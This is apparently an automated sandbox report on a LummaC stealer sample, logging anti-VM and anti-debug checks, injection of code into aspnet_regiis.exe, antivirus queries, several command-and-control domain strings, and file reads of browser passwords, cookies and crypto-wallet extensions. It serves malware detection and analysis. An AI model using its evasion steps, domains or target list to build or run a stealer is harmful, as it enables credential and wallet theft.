Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ReploidReplic.exe PID: 2312, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 1130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 2A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 52A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 62A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 63D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 73D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 7820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 8820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory allocated: 9820000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1352	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1352	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1858552564.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002C96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008DD910 LdrInitializeThunk,

2_2_008DD910

Source: C:\Users\user\Desktop\ReploidReplic.exe

Code function: 0_2_6CE12C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE12C6A

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE12C39 mov eax, dword ptr fs:[00000030h]		0_2_6CE12C39
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE11A65 mov eax, dword ptr fs:[00000030h]		0_2_6CE11A65

Source: C:\Users\user\Desktop\ReploidReplic.exe

Code function: 0_2_6CE1484C GetProcessHeap,

0_2_6CE1484C

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE12C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CE12C6A
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE102DA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CE102DA
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE0FE01 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CE0FE01

Source: C:\Users\user\Desktop\ReploidReplic.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\ReploidReplic.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ReploidReplic.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: ReploidReplic.exe	String found in binary or memory: rabidcowse.shop
Source: ReploidReplic.exe	String found in binary or memory: cloudewahsj.shop
Source: ReploidReplic.exe	String found in binary or memory: tirepublicerj.shop
Source: ReploidReplic.exe	String found in binary or memory: noisycuttej.shop
Source: ReploidReplic.exe	String found in binary or memory: wholersorie.shop
Source: ReploidReplic.exe	String found in binary or memory: framekgirus.shop
Source: ReploidReplic.exe	String found in binary or memory: nearycrepso.shop
Source: ReploidReplic.exe	String found in binary or memory: abruptyopsn.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A1000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E2000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E5000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8F3000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A1000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E2000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E5000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8F3000	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A6C008	Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe

Code function: 0_2_6CE104A8 cpuid

0_2_6CE104A8

Source: C:\Users\user\Desktop\ReploidReplic.exe	Queries volume information: C:\Users\user\Desktop\ReploidReplic.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe

Code function: 0_2_6CE0FF23 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CE0FF23

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000002.00000003.1848057911.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe, 00000002.00000003.1804631888.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: aspnet_regiis.exe, 00000002.00000003.1848057911.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000002.00000003.1822783815.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
